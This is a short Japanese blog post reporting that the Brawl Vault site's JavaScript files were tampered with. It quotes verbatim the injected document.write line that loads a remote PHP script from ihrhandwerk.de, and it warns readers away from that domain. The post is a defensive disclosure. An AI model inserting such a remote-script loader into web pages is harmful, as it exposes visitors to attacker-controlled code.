追記
2014/01/18、改ざんされたファイル全てが元通りに修正されているのを確認。
もうアクセスしても心配なさそうです。
先程メインで使ってるFirefoxでBVを見てたら、いきなりこんな物騒な画面が出てアクセスブロックされた。
サブで使ってるCoolNovoもこんな感じでブロックされる。
ハックロムを快く思わない誰かのいたずら通報か? と思ったけど
そうだと言い切れる自信がないので調べてみた。
とりあえず、CoolNovoのデバッガでアクセスログを取得。
すると…
BVの核となるJavaScriptファイルの複数から、
ihrhandwerk.deというドメインにあるファイル名が英数字の羅列のPHPにアクセスしている。
【注意】
この記事を投下した時点ではihrhandwerk.deにアクセスしても何も起こりませんが、
今後何を仕掛けられるかわかったもんじゃないので
興味本位でihrhandwerk.deにアクセスしないでください。
とりあえず適当に1つBVのJSを開いてみたら…。
script要素をdocument.writeするコードが
以下のスクリプト全てに挿入されとる。
いずれも、最後に以下のコードが追加されてるっぽい。
/* ランダムな英数字 */ document.write("<script src='http://www.ihrhandwerk.de/qmBrvcg6.php?id=129841940' type='text/javascript'></" + "script>"); /*/ ランダムな英数字 */
人力でこんな意味不なコメントを入れる訳ない。
どう見ても改ざんです本当にありがとうございました。
サーバーが安定しない*1上に今度は改竄ですか。。
コーティングもアレだし、ホントしっかりしてくれよBrawl Vaultさんよぅ…
*1:度重なる403/404/503エラーの数々